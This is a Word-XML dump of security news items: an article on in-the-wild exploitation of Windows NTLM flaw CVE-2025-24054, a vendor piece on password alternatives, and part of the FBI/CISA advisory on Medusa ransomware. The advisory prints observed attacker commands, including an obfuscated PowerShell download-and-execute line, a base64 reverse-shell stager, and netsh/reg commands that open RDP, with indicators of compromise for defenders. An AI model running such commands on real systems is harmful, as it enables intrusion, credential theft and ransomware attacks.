      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>https://www.facebook.com/valuatesreports/ YouTube: https://www.youtube.com/@valuatesreports6753 https://www.facebook.com/valuateskorean https://www.facebook.com/valuatesspanish https://www.facebook.com/valuatesjapanese https://valuatesreportspanish.blogspot.com/ https://valuateskorean.blogspot.com/ https://valuatesgerman.blogspot.com/ https://valuatesreportjapanese.blogspot.com/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Logo: https://mma.prnewswire.com/media/1082232/Valuates_Reports_Logo.jpg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SOURCE Valuates Reports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WANT YOUR COMPANY'S NEWS FEATURED ON PRNEWSWIRE.COM?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440k+ Newsrooms &amp; Influencers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9k+ Digital Media Outlets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270k+ Journalists Opted In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GET STARTED</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1B73" w:rsidRDefault="00EB1B73" w:rsidP="00EB1B73">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>PR Newswire 2025.04.21 20:15</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>https://www.prnewswire.com/news-releases/ransomware-protection-solutions-market-to-grow-at-double-digit-cagr-reaching-usd-51-71-billion-by-2031--valuates-reports-302433529.html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>***</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1B73" w:rsidRDefault="00EB1B73" w:rsidP="00EB1B73">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Windows NTLM vulnerability exploited in multiple attack campaigns (CVE-2025-24054)</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CVE-2025-24054, a Windows NTLM hash disclosure vulnerability that Microsoft has issued patches for last month, has been leveraged by threat actors in campaigns targeting government and private institutions in Poland and Romania.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"Active exploitation in the wild has been observed since March 19, 2025, potentially allowing attackers to leak NTLM hashes or user passwords and compromise systems," Check Point researchers have shared. About CVE-2025- 24054</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CVE-2025-24054 allows attackers to capture the NTLMv2 response (i.e., the NTLMv2-SSP hash) sent by the victims' machine to an attacker-operated SMB server that initiated an authentication request.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Attackers can attempt to attempt to brute-force this captured hash offline or can use it to perform relay attacks.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"NTLM relay attacks fall under the category of man-in-the-middle (MitM) attacks that exploit the NTLM authentication protocol. Instead of cracking the password, the attacker captures the hash and passes it to another service to authenticate as the user," the researchers explained.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"NTLM relay attacks are much more dangerous when the stolen credentials belong to a privileged user, as the attacker is using it for privilege escalation and lateral movement on the network."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CVE-2025-24054, privately disclosed to Microsoft by three researchers, was considered by the company to be "less likely" to be exploited.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Microsoft had initially assigned CVE-2025-24071 to the vulnerability, but later created a new identifier: CVE-2025-24054. Both were patched on March 11, 2025 and both can allow an unauthorized attacker to perform spoofing over a network, but the former requires the target to open a folder that contains a specially crafted file, while the latter requires them only to interact with (e.g., select, inspect, move) the malicious file, and not necessarily to open and execute it.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that respect, CVE-2025-24054 is similar to CVE-2024-43451, a vulnerability that was exploited in 2024 as a zero-day to target Ukrainian entities. The spotted attack campaigns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One of the researchers who initially flagged CVE-2025-24054 released a PoC exploit and a technical write-up on the flaw on March 16 and 18, respectively.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Check Point researchers say that the first attacks leveraging CVE-2025- 24054 were spotted on March 19, and that the campaign targeting government and private institutions in Poland and Romania started around March 20 and March 21.</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campaign consisted of targeted the victims via email phishing links, which include an archive file," the researchers explained.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archive xd.zip was downloaded from Dropbox and contained files with the sole purpose of leaking NTLMV2-SSp hashes. Those four embedded files contacted a malicious SMB server with IP address 159.196.128[.]120."</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One of the files contained in the archive triggered CVE-2025-24054, while another exploited CVE-2024-43451. According to a previous report by HarfangLab researchers, the IP address of the server has been previously linked to APT28, aka Fancy Bear or Forest Blizzard.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Until March 25, Check Point have observed approximately 10 additional campaigns with the end goal of retrieving NTLMV2-SSp hashes from the targeted victims. On that day, they spotted one targeting companies around the world.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phishing emails were carefully constructed to trick targets into downloading the attachment containing an unzipped exploit file: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Phishing email with exploit file attached (Source: Check Point Research)</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"As soon as victims downloaded the exploit, their NTLMV2-SSp hashes were leaked," the researchers explained. Fixes for CVE-2025-24054</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Even if they are not generally considered to be as high-risk as flaws leading to remote code execution, it's become obvious that some attackers are ready to take advantage of NTLM vulnerabilities quickly and patches for them should be prioritized - especially because NTLMv2 is still widely used for authentication even though Microsoft has officially deprecated all NTLM versions last year and urged users to switch to Kerberos.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Microsoft has released patches for CVE-2025-24054 for all supported Windows and Windows Server versions, but for those still using older, unsupported versions - e.g., Windows 7, Windows 10 v21H2, Windows Server 2008 R2 and Server 2012 R2 - micropatching is a viable solution.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Subscribe to our breaking news e-mail alert to never miss out on the latest breaches, vulnerabilities and cybersecurity threats. Subscribe here!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1B73" w:rsidRDefault="00EB1B73" w:rsidP="00EB1B73">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Help Net Security 2025.04.17 17:47</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>https://www.helpnetsecurity.com/2025/04/17/windows-ntlm-vulnerability-exploited-in-multiple-attack-campaigns-cve-2025-24054/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>***</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1B73" w:rsidRDefault="00EB1B73" w:rsidP="00EB1B73">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>The 7 technology trends that could replace passwords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by Specops Software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March 26, 2025 11:16 AM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Many of us have moved beyond passwords alone for online security, and it's not hard to see why. Our new Specops Breached Password Report found that of one billion stolen credentials, almost a quarter met standard complexity requirements - and still the criminals broke through.</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These stolen passwords - 230 million of them - met all the requirements of their organization, including more than eight characters, one capital letter, a special character and a number.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And there's plenty more evidence of password vulnerabilities: Verizon's Data Breach Investigations Report (DBIR) 2024 found that stolen credentials were the top action leading to a breach. Alternatives to passwords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 it's little wonder that new and evolving authentication methods have gained traction in recent years. But could they replace passwords altogether? We think the answer is a likely ‘no'. Passwords will remain a key security element for most orgniazations, with additional authentication methods used to enhance defenses.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First, let's look at some of the developing alternatives and technologies that could transform traditional approaches to passwords.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Secure your Active Directory passwords with Specops Password Policy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Verizon's Data Breach Investigation Report found stolen credentials are involved in 44.7% of breaches.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Effortlessly secure Active Directory with compliant password policies, blocking 4+ billion compromised passwords, boosting security, and slashing support hassles! Try it for free Biometric authentication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Biometric authentication uses a person's physical attributes to confirm their identity: for example, fingerprints, facial recognition, iris scans etc. There are obvious advantages: fingerprints, for instance, are unique to an individual, so they can't easily be mimicked or replicated.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technology is also simple to use, avoiding the need to input data that could be easily forgotten.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But biometric authentication isn't invulnerable. For example, biometric spoofing could exploit fake versions of a face or other biometric data to attempt to fool a system. Authentication systems that have no liveness checks can be particularly vulnerable to deepfake attacks.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And if the system is compromised, you can't just reset biometric data, like you would a password. Behavioral biometrics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Like biometric authentication, behavioral biometrics relies on characteristics that are unique to an individual. Except this time, it's the way you interact with the application or website in question: for instance, how you move your mouse or type on the keyboard.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are obvious benefits - the user doesn't have to do anything special, so it's convenient to use. It also mitigates the danger of credential sharing, as you can't easily share your typing rhythm.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But again, it can be costly to set up and there are potential concerns around data privacy in the event of a breach. Blockchain for secure password storage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Blockchain could provide a highly secure method to secure data. As utilized in cryptocurrency, it provides an incorruptible method of distributing data across a decentralized network. However, there remain questions around the possible cost of storing passwords on blockchain ledgers like Bitcoin. Zero- knowledge proof technology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ZKP proves the truthfulness of a mathematical statement, without revealing additional information ‘that may have been useful in finding said truthfulness', as noted by NIST.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passwords, this provides a secure way to let users prove that they know their own password, without any need to transmit their actual credentials - it is a cryptographic method that proves you know your password without needing to actually submit your credentials.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other words, you can prove who you are without risking your data.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However, challenges could include the processing power required for ZKP and potential issues around complexity. Passphrases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Another alternative to traditional passwords is the use of passphrases. Unlike standard passwords, which are often short and complex, passphrases consist of multiple words strung together, creating a longer but more memorable authentication method.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example, a passphrase like "PurpleBananaSunsetDancer!" is easier to remember than a random string of letters and numbers, while still providing strong security due to its length.</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Passphrases are particularly effective against brute-force attacks, as their extended length exponentially increases the number of possible combinations.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they still rely on user-generated input, meaning they can be vulnerable if common phrases or predictable word patterns are used. You can find a full guide on moving to passphrases here. Passkeys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Passkeys are phishing-resistant alternatives to passwords that have been growing in popularity over the last couple of years. Based on FIDO2, passkeys use public key cryptography to authenticate users and log them into websites and apps. A passkey is typically tied to a device, such as a phone or computer, and can be unlocked using biometrics or a PIN.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Passkeys are resistant to credential stuffing and phishing attacks because the private key used for authentication is securely stored on users' devices and never shared with websites or transmitted over the internet. As a result, there are no credentials that can be stolen in phishing attacks or data breaches.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Passkeys are now widely supported on all major platforms, including Google, Apple, and Microsoft. Security keys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Security keys are physical devices, usually USB, NFC, or Bluetooth, that are most commonly used for multi-factor authentication (MFA). After entering a password, users tap the security key or enter a PIN to verify their identity, which allows the user to log in to the site or application.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some platforms now use them for password-less logins where the owner uses a PIN or biometrics to prove that they are the owner and to allow logins. Support for password-less logins using security keys is currently available in Windows,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Security keys are resistant to attacks as they not only require access to the physical device but also the biometrics and PIN required to authenticate the login. The enduring advantages of passwords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Many of these techniques have been available for some time, yet passwords remain the foundation of online security, used daily by consumers and businesses across the globe. Why is this?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Simple and universal: the concept has been established for decades and is easy for everyone to understand.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Flexibility: you can easily reset your password. You can't say the same thing for a facial scan or fingerprints.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Effectiveness: passwords are either right or wrong. Even when biometric scanners fail or security tokens go missing, passwords remain a reliable backup authentication method. The best of both worlds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optimum approach isn't to choose between passwords and some other form of security. Instead, we should embrace the advantages of new technologies, while retaining the convenience and security of passwords.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solution is to opt for the best of both worlds by building multi-factor authentication, going beyond two-factor authentication to build in as many layers of security as possible. This could involve the use of a code texted to your phone alongside a facial scan and the use of a password.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Even here, vulnerabilities remain. MFA can be targeted through methods like prompt bombing or adversary-in-the-middle attacks, often based on exploiting a weak password.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key is therefore to ensure your passwords are as robust as possible, no matter what technology you use to enhance your security.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Specops Secure Access: Secure password reset with integrated multi-factor authentication, reducing the risk of unauthorized access Scan your Active Directory for compromised passwords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Authentication technologies will continue to advance, but you'll always need to stay on top of your passwords.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Specops Password Policy integrates with your Active Directory to continuously block a growing database of more than 4 billion compromised passwords, while preventing users from creating weak passwords and scanning for passwords that have been compromised or breached.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Contact us today for your free trial.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and written by Specops Software.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1B73" w:rsidRDefault="00EB1B73" w:rsidP="00EB1B73">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>BleepingComputer 2025.03.26 19:16</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>https://www.bleepingcomputer.com/news/security/the-7-technology-trends-that-could-replace-passwords/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>***</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1B73" w:rsidRDefault="00EB1B73" w:rsidP="00EB1B73">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>#StopRansomware: Medusa Ransomware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Release Date March 12, 2025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Alert Code AA25-071A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Cybersecurity Best Practices, Organizations and Cyber Safety, Critical Infrastructure Security and Resilience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Actions for Organizations to Take Today to Mitigate Cyber Threats Related to Medusa Ransomware Activity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Mitigate known vulnerabilities by ensuring operating systems, software, and firmware are patched and up to date within a risk-informed span of time. Segment networks to restrict lateral movement from initial infected devices and other devices in the same organization.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Filter network traffic by preventing unknown or untrusted origins from accessing remote services on internal systems.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Summary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Note: This joint Cybersecurity Advisory is part of an ongoing #StopRansomware effort to publish advisories for network defenders detailing various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.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Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) are releasing this joint advisory to disseminate known Medusa ransomware TTPs and IOCs, identified through FBI investigations as recently as February 2025.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Medusa is a ransomware-as-a-service (RaaS) variant first identified in June 2021. As of February 2025, Medusa developers and affiliates have impacted over 300 victims from a variety of critical infrastructure sectors with affected industries including medical, education, legal, insurance, technology, and manufacturing. The Medusa ransomware variant is unrelated to the MedusaLocker variant and the Medusa mobile malware variant per the FBI's investigation.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FBI, CISA, and MS-ISAC encourage organizations to implement the recommendations in the Mitigations section of this advisory to reduce the likelihood and impact of Medusa ransomware incidents.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Download the PDF version of this report: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a downloadable list of IOCs, see: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AA25-071A STIX XML (XML, 34.30 KB )</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AA25-071A STIX JSON (JSON, 42.28 KB ) Technical Details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Note: This advisory uses the MITRE ATT&amp;CK(R) Matrix for Enterprise framework, version 16. See the MITRE ATT&amp;CK Tactics and Techniques section of this advisory for a table of the threat actors' activity mapped to MITRE ATT&amp;CK tactics and techniques. Background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RaaS Medusa variant has been used to conduct ransomware attacks from 2021 to present. Medusa originally operated as a closed ransomware variant, meaning all development and associated operations were controlled by the same group of cyber threat actors. While Medusa has since progressed to using an affiliate model, important operations such as ransom negotiation are still centrally controlled by the developers. Both Medusa developers and affiliates-referred to as "Medusa actors" in this advisory-employ a double extortion model, where they encrypt victim data and threaten to publicly release exfiltrated data if a ransom is not paid. Initial Access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Medusa developers typically recruit initial access brokers (IABs) in cybercriminal forums and marketplaces to obtain initial access [TA0001] to potential victims. Potential payments between $100 USD and $1 million USD are offered to these affiliates with the opportunity to work exclusively for Medusa. Medusa IABs (affiliates) are known to make use of common techniques, such as: Phishing campaigns as a primary method for stealing victim credentials [T1566].</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Exploitation of unpatched software vulnerabilities [T1190] through Common Vulnerabilities and Exposures (CVEs) such as the ScreenConnect vulnerability CVE-2024-1709 [CWE-288: Authentication Bypass Using an Alternate Path or Channel] and Fortinet EMS SQL injection vulnerability [CVE-2023-48788 [CWE 89: SQL Injection]. Discovery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Medusa actors use living off the land (LOTL) and legitimate tools Advanced IP Scanner and SoftPerfect Network Scanner for initial user, system, and network enumeration. Once a foothold in a victim network is established, commonly scanned ports include: 21 (FTP) 22 (SSH) 23 (Telnet) 80 (HTTP) 115 (SFTP) 443 (HTTPS) 1433 (SQL database) 3050 (Firebird database) 3128 (HTTP web proxy) 3306 (MySQL database) 3389 (RDP)</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Medusa actors primarily use PowerShell [T1059.001] and the Windows Command Prompt (cmd.exe) [T1059.003] for network [T1046] and filesystem enumeration [T1083] and to utilize Ingress Tool Transfer capabilities [T1105]. Medusa actors use Windows Management Instrumentation (WMI) [T1047] for querying system information. Defense Evasion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Medusa actors use LOTL to avoid detection [TA0005]. (See Appendix A for associated shell commands observed during FBI investigations of Medusa victims.) Certutil (certutil.exe) is used to avoid detection when performing file ingress.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Actors have been observed using several different PowerShell detection evasion techniques with increasing complexity, which are provided below. Additionally, Medusa actors attempt to cover their tracks by deleting the PowerShell command line history [T1070.003].</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this example, Medusa actors use a well-known evasion technique that executes a base64 encrypted command [T1027.013] using specific execution settings.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>powershell -exec bypass -enc &lt;base64 encrypted command string&gt;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another example, the DownloadFile string is obfuscated by slicing it into pieces and referencing it via a variable [T1027].</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>powershell -nop -c $x = 'D' + 'Own' + 'LOa' + 'DfI' + 'le'; Invoke- Expression (New-Object Net.WebClient).$x.Invoke(http://&lt;ip&gt;/&lt;RAS tool&gt;.msi)</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In the final example, the payload is an obfuscated base64 string read into memory, decompressed from gzip, and used to create a scriptblock. The base64 payload is split using empty strings and concatenation, and uses a format </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>operator (-f) followed by three arguments to specify character replacements in the base64 payload.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>powershell -nop -w hidden -noni -ep bypass &amp;([scriptblock]::create(( New-Object System.IO.StreamReader( New-Object System.IO.Compression.GzipStream(( New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String( (('&lt;base64 payload string&gt;')-f'&lt;character replacement 0&gt;','&lt;character replacement 1&gt;', '&lt;character replacement 2&gt;')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))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obfuscated base64 PowerShell payload is identical to powerfun.ps1, a publicly available stager script that can create either a reverse or bind shell over TLS to load additional modules. In the bind shell, the script awaits a connection on local port 443 [T1071.001], and initiates a connection to a remote port 443 in the reverse shell.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some instances, Medusa actors attempted to use vulnerable or signed drivers to kill or delete endpoint detection and response (EDR) tools [T1562.001].</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FBI has observed Medusa actors using the following tools to support command and control (C2) and evade detection: Ligolo.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>A reverse tunneling tool often used to create secure connections between a compromised host and threat actor's machine.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Cloudflared.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Formerly known as ArgoTunnel.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Used to securely expose applications, services, or servers to the internet via Cloudflare Tunnel without exposing them directly. Lateral Movement and Execution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Medusa actors use a variety of legitimate remote access software [T1219]; they may tailor their choice based on any remote access tools already present in the victim environment as a means of evading detection.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Investigations identified Medusa actors using remote access software AnyDesk, Atera, ConnectWise, eHorus, N-able, PDQ Deploy, PDQ Inventory, SimpleHelp, and Splashtop. Medusa uses these tools-in combination with Remote Desktop Protocol (RDP) [T1021.001] and PsExec [T1569.002]-to move laterally [TA0008] through the network and identify files for exfiltration [TA0010] and encryption [T1486]. When provided with valid username and password credentials, Medusa actors use PsExec to: Copy (-c) one script from various batch scripts on the current machine to the remote machine and execute it with SYSTEM level privileges (-s). Execute an already existing local file on a remote machine with SYSTEM level privileges.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Execute remote shell commands using cmd /c.</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One of the batch scripts executed by PsExec is openrdp.bat, which first creates a new firewall rule to allow inbound TCP traffic on port 3389: netsh advfirewall firewall add rule name="rdp" dir=in protocol=tcp localport=3389 action=allow</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Then, a rule to allow remote WMI connections is created: netsh advfirewall firewall set rule group="windows management instrumentation (wmi)" new enable=yes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Finally, the registry is modified to allow Remote Desktop connections: reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f</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Mimikatz has also been observed in use for Local Security Authority Subsystem Service (LSASS) dumping [T1003.001] to harvest credentials [TA0006] and aid lateral movement. Exfiltration and Encryption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Medusa actors install and use Rclone to facilitate exfiltration of data to the Medusa C2 servers [T1567.002] used by actors and affiliates. The actors use Sysinternals PsExec, PDQ Deploy, or BigFix [T1072] to deploy the encryptor, gaze.exe, on files across the network-with the actors disabling Windows Defender and other antivirus services on specific targets.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Encrypted files have a .medusa file extension. The process gaze.exe terminates all services [T1489] related to backups, security, databases, communication, file sharing and websites, then deletes shadow copies [T1490] and encrypts files with AES-256 before dropping the ransom note. The actors then manually turn off [T1529] and encrypt virtual machines and delete their previously installed tools [T1070]. Extortion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Medusa RaaS employs a double extortion model, where victims must pay [T1657] to decrypt files and prevent further release. The ransom note demands victims make contact within 48 hours via either a Tor browser based live chat, or via Tox, an end-to-end encrypted instant-messaging platform. If the victim does not respond to the ransom note, Medusa actors will reach out to them directly by phone or email. Medusa operates a .onion data leak site, divulging victims alongside countdowns to the release of information. Ransom demands are posted on the site, with direct hyperlinks to Medusa affiliated cryptocurrency wallets. At this stage, Medusa concurrently advertises sale of the data to interested parties before the countdown timer ends. Victims can additionally pay $10,000 USD in cryptocurrency to add a day to the countdown timer.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FBI investigations identified that after paying the ransom, one victim was contacted by a separate Medusa actor who claimed the negotiator had stolen the ransom amount already paid and requested half of the payment be made again to provide the "true decryptor"- potentially indicating a triple extortion scheme. Indicators of Compromise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 lists the hashes of malicious files obtained during investigations.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 Malicious Files Files Hash (MD5) Description !!!READ_ME_MEDUSA!!!.txt Redacted Ransom note file openrdp.bat 44370f5c977e415981febf7dbb87a85c Allows incoming RDP and remote WMI connections pu.exe 80d852cd199ac923205b61658a9ec5bc Reverse shell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Table 2 includes email addresses used by Medusa actors to extort victims; they are exclusively used for ransom negotiation and contacting victims following compromise. These email addresses are not associated with phishing activity conducted by Medusa actors.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2: Medusa Email Addresses Email Addresses Description key.medusa.serviceteam@protonmail.com Used for ransom negotiation medusa.support@onionmail.org Used for ransom negotiation mds.svt.breach@protonmail.com Used for ransom negotiation mds.svt.mir2@protonmail.com Used for ransom negotiation MedusaSupport@cock.li Used for ransom negotiation MITRE ATT&amp;CK Tactics and Techniques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See Table 3 - Table 11 for all referenced threat actor tactics and techniques in this advisory. For assistance with mapping malicious cyber activity to the MITRE ATT&amp;CK framework, see CISA and MITRE ATT&amp;CK's Best Practices for MITRE ATT&amp;CK Mapping and CISA's Decider Tool.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3: Initial Access Technique Title ID Use Exploit Public-Facing Application T1190 Medusa actors exploited unpatched software or n-day vulnerabilities through common vulnerabilities and exposures.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Initial Access TA0001 Medusa actors recruited initial access brokers (IABS) in cybercriminal forums and marketplaces to obtain initial access. Phishing T1566 Medusa IABS used phishing campaigns as a primary method for delivering ransomware to victims.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4: Defense Evasion Technique Title ID Use Indicator Removal: Clear Command History T1070.003 Medusa actors attempt to cover their tracks by deleting the PowerShell command line history. Obfuscated Files or Information: Encrypted/Encoded File T1027.013 Medusa actors use a well-known evasion technique that executes a base64 encrypted command.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Obfuscated Files or Information T1027 Medusa actors obfuscated a string by slicing it into pieces and referencing it via a variable.</w:t>
      </w:r>
      <w:r>
